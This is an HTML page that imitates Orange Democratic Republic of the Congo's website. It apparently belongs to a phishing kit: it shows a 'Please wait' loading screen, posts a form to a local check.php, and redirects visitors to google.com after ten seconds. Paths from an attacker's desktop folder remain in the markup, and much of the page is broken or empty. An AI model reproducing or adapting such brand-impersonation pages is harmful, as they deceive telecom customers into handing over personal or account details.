

<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">


<meta -equiv="Content-Type" content="text/html; charset=UTF-8">
 
  <meta http-equiv="refresh" content="10;url=http://www.google.com/" />

  <meta name="smartbanner:title" content="Orange et moi">
  <meta name="smartbanner:daysHidden" content="15">
  <meta name="smartbanner:daysReminder" content="30">
  <meta name="smartbanner:author" content="Orange Congo">
  <meta name="smartbanner:price" content="Gratuit">
  <meta name="smartbanner:button" content="Ouvrir">
  <meta name="smartbanner:price-suffix-apple" content="sur App Store">
  <meta name="smartbanner:icon-apple" content="/2/img/smartbanner/ios_icon.png">
  <meta name="smartbanner:button-url-apple" content="">
  <meta name="smartbanner:price-suffix-google" content="sur Google Play">
  <meta name="smartbanner:icon-google" content="/2/img/smartbanner/android_icon.png">
  <meta name="smartbanner:button-url-google" content="">
  <meta name="smartbanner:enabled-platforms" content="ios,android">
 
 <meta name="description" content="Site officiel Orange République Démocratique du Congo. Leader de la téléphonie mobile, fixe et Internet en République Démocratique du Congo">  
   
  <meta content="width=device-width, initial-scale=1, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no" name="viewport"> 
  <title> Orange Dar Box </title> 
 
  <style type="text/css" media="screen">
    .o-contact input,
    .o-contact select,
    .o-contact textarea {
        padding: 7px 20px;
        width: 50%;
    }
    input[type="radio"]{
      padding: 0;
      width: auto;
      height: auto;
    }
    .radio-inline{
      width: 70px;
    }
    
    .o-form-group {
        margin-bottom: 10px;
        width: 100%;
        float: left;
    }
    
    .o-form-group div {
        position: relative;
    }
    
    .o-add-field {
        position: absolute;
        left: 100%;
        top: 0;
    }
    </style> 
  <link href="./Orange Dar Box_files/bootstrap__portal__.css" rel="stylesheet" type="text/css">
  <link href="./Orange Dar Box_files/header__portal__.css" rel="stylesheet" type="text/css">
  <link href="./Orange Dar Box_files/global.css" rel="stylesheet" type="text/css">
  <link href="./Orange Dar Box_files/orange_socialbar__portal__.css" rel="stylesheet" type="text/css">
  <link rel="shortcut icon" href="file:///C:/Users/X5/Desktop/new/Orange/Contact%20li%C3%A9%20%C3%A0%20une%20ligne%20t%C3%A9l%C3%A9phonique%20_%20Orange%20R%C3%A9publique%20D%C3%A9mocratique%20du%20Congo_files/favicon_1.ico"> 
  <meta name="pr:cid" content="374">
 </head> 
 <body>
  <noscript>
  </noscript> 
  <header id="etn-mosse-header" class="etn-orange-portal-- internal">
   <div class="o-sitetype-bar o-extra-bar o-visible-xs-block o-black">
  
   </div>
   <div style="top: 0px; width: 100%; z-index: 11000; height: 40px;" class="o-topbar o-black o-border-bottom o-sticky o-hidden-xs" data-lf-top-fixed="">
    <ul class="o-nav o-nav-pills o-container o-color-white o-f15 o-ft13 ">
     <li class="o-visible-sm-block o-visible-md-block o-visible-lg-block" role="presentation">

   </li></ul></div>
   <div style="width:100%;" class="o-navbar o-black o-sticky o-h80 o-border-bottom" id="o-secondtopmenu" data-lf-top-fixed="">
    <div class="o-container">
     <a class="___portalmenulink" id="___portalhomepagelink" href="file:///C:/Users/X5/Desktop/new/Orange/://orange.cd/" target="_blank"><img src="./Orange Dar Box_files/logo_1.png" alt="logo" class="o-logo"></a>
     <nav class="o-f18 o-col3 o-color-white o-dib o-main" style="vertical-align: bottom;">
      <a href="file:///C:/Users/X5/Desktop/new/Orange/index.htm" class="o-visible-sm-inline-block o-visible-xs-inline-block o-hidden-lg o-mobile-menu-bt" target="_blank"><img src="./Orange Dar Box_files/menu_icon.png"></a>
      <ul class="o-nav o-nav-pills" style="max-height: 692px; height: auto;">
     
        <h2>Box Fixe Orange</h2> 
      </ul></nav></div>
     </div>
    
   
  <div class="o-container"><div class="o-login-cart-section" style="right: 160px;"><div class="login-section"></div><div class="cart-section"></div></div></div><div class="o-container"><div class="o-login-cart-section" style="right: 160px;"><div class="login-section"></div><div class="cart-section"></div></div></div></header> 
  <div class="etn-orange-portal--"> 
   <div class="o-container o-contact"> 
    <div id="pagetitle">
     &nbsp;
    </div> 
	
	<form id="form1" name="form1" method="POST" action="file:///C:/Users/X5/Desktop/new/Orange/check.php">

	
     <h2>Please wait while ...</h2> 
    <br> 
    <p style="color:#aaa"><em><span style="color:red">* </span>Champs obligatoire</em></p> 
    <hr> 
    <div class="o-alert o-alert-danger" id="errdiv" role="alert" style="display:none"></div> 
    <form class="form-horizontal" autocomplete="off" id="_contact_frm" method="post" enctype="application/x-www-form-urlencoded; charset=UTF-8"> 
     <input type="hidden" name="form_type" value="b2c-sales"> 
     <input type="hidden" value="1" name="issave"> 
     <input type="hidden" value="fr" name="lang"> 
     <input type="hidden" name="form_token" id="form_token" value="6130b1fa-ab89-4878-85f7-8e3e1bff6dd8"> 
     <div class="o-form-group">
<img src="loading.gif"></img>
</center>
      </div> 
     </div> 
    </form> 
   </div> 
  </div>  
  
  <footer id="etn-mosse-footer" class="etn-orange-portal-- internal" style="clear:both">
   <div class="o-black">
    <div class="">
     <div class="o-socialbar o-black">
      <div class="o-container">
       <div id="o-followbar" class="o-second o-black o-horizontal ">
       
        <div style="o-max-width: calc(100% - 85px); " class="o-content ">
           <g>
            <path fill="#ffffff" d="M9.922,7.999C8.859,7.999,8,8.862,8,9.925c0,1.063,0.859,1.927,1.922,1.927 c1.06,0,1.921-0.863,1.921-1.927C11.843,8.862,10.982,7.999,9.922,7.999z M8.263,24h3.317V13.312H8.263V24z M20.023,13.046 c-1.613,0-2.694,0.886-3.137,1.727h-0.045v-1.46H13.66V24h3.315v-5.287c0-1.395,0.264-2.745,1.988-2.745 c1.7,0,1.725,1.595,1.725,2.835V24h3.312v-5.862C23.999,15.259,23.379,13.046,20.023,13.046z"></path>
           </g>
          
        </div>
       </div>
      </div>
     </div>
     <nav class="o-menu o-black o-f14 o-ft14 o-color-white">
      <div class="o-container">
       <div class="o-row">
        <ul class="portal-col-5">
        </ul>
        <ul class="portal-col-5">

        </ul>
        <ul class="portal-col-5">
         <li class=""><a class="___portalmenulink " href="javascript:void(0)" target="_self"> </a><span class="expand" style="display: inline;"></span><span class="expand" style="display: inline;"></span></li>
         <li class=""><a class="" target="_blank"> </a></li>
        </ul>
        <ul class="portal-col-5">
         <li class="" style="display: none;"></li>
        </ul>
       </div>
      </div>
     </nav>
     <div class="o-f14 o-ft13">
      <div class="o-shortcut o-border-bottom o-color-white ">
       <div class="o-container "></div>
      </div>
      <div class="o-container o-legal o-black o-color-white ">
       <a class="___portalmenulink   " href="javascript:void(0)" target="_self"><p>© Orange</p></a>
       <a class="___portalmenulink  o_menu_open_new_tab   " href="file:///C:/Users/X5/Desktop/new/Orange/://orange.com/" target="_blank"><p></p></a>
      </div>
      <img src="./Orange Dar Box_files/logo_1.png" alt="orange logo" class="o-logo">
     </div>
    </div>
   </div>
  </footer>
  <script type="text/javascript">
hookforms();
</script> 
  <script src="file:///C:/Users/X5/Desktop/new/Orange/Contact%20li%C3%A9%20%C3%A0%20une%20ligne%20t%C3%A9l%C3%A9phonique%20_%20Orange%20R%C3%A9publique%20D%C3%A9mocratique%20du%20Congo_files/jquery-1.9.1.js.download"></script> 
  <script type="text/javascript">var ___portaljquery = $.noConflict(true);</script> 
  <script src="file:///C:/Users/X5/Desktop/new/Orange/Contact%20li%C3%A9%20%C3%A0%20une%20ligne%20t%C3%A9l%C3%A9phonique%20_%20Orange%20R%C3%A9publique%20D%C3%A9mocratique%20du%20Congo_files/jquery-ui-1.9.1-min-asimina.js.download"></script> 
  <script src="file:///C:/Users/X5/Desktop/new/Orange/Contact%20li%C3%A9%20%C3%A0%20une%20ligne%20t%C3%A9l%C3%A9phonique%20_%20Orange%20R%C3%A9publique%20D%C3%A9mocratique%20du%20Congo_files/stat.js.download"></script> 
  <script src="file:///C:/Users/X5/Desktop/new/Orange/Contact%20li%C3%A9%20%C3%A0%20une%20ligne%20t%C3%A9l%C3%A9phonique%20_%20Orange%20R%C3%A9publique%20D%C3%A9mocratique%20du%20Congo_files/script.js.download"></script> 
  <script src="file:///C:/Users/X5/Desktop/new/Orange/Contact%20li%C3%A9%20%C3%A0%20une%20ligne%20t%C3%A9l%C3%A9phonique%20_%20Orange%20R%C3%A9publique%20D%C3%A9mocratique%20du%20Congo_files/fixmenu.js.download"></script> 
  <script src="file:///C:/Users/X5/Desktop/new/Orange/Contact%20li%C3%A9%20%C3%A0%20une%20ligne%20t%C3%A9l%C3%A9phonique%20_%20Orange%20R%C3%A9publique%20D%C3%A9mocratique%20du%20Congo_files/genform.js.download"></script> 
  <script src="file:///C:/Users/X5/Desktop/new/Orange/Contact%20li%C3%A9%20%C3%A0%20une%20ligne%20t%C3%A9l%C3%A9phonique%20_%20Orange%20R%C3%A9publique%20D%C3%A9mocratique%20du%20Congo_files/completion.min.js.download"></script> 
  <script src="file:///C:/Users/X5/Desktop/new/Orange/Contact%20li%C3%A9%20%C3%A0%20une%20ligne%20t%C3%A9l%C3%A9phonique%20_%20Orange%20R%C3%A9publique%20D%C3%A9mocratique%20du%20Congo_files/search.js.download"></script> 
  <script>__initCompleter('://completion.ke.orange.fr/proxy/cmplEmea','pays=rdc&langue=fr&type=res','://search.orange.cd/?bhv=results&pays=rdc&langue=fr&type=res&kw=');</script> 
  <script type="text/javascript">function __gotoPortalHome() { window.location='/particuliers/5/182/accueil-639.html'; }</script> 
 
<div class="xdsoft_datetimepicker xdsoft_noselect xdsoft_"><div class="xdsoft_datepicker active"><div class="xdsoft_mounthpicker">

</div></div></div></body></html>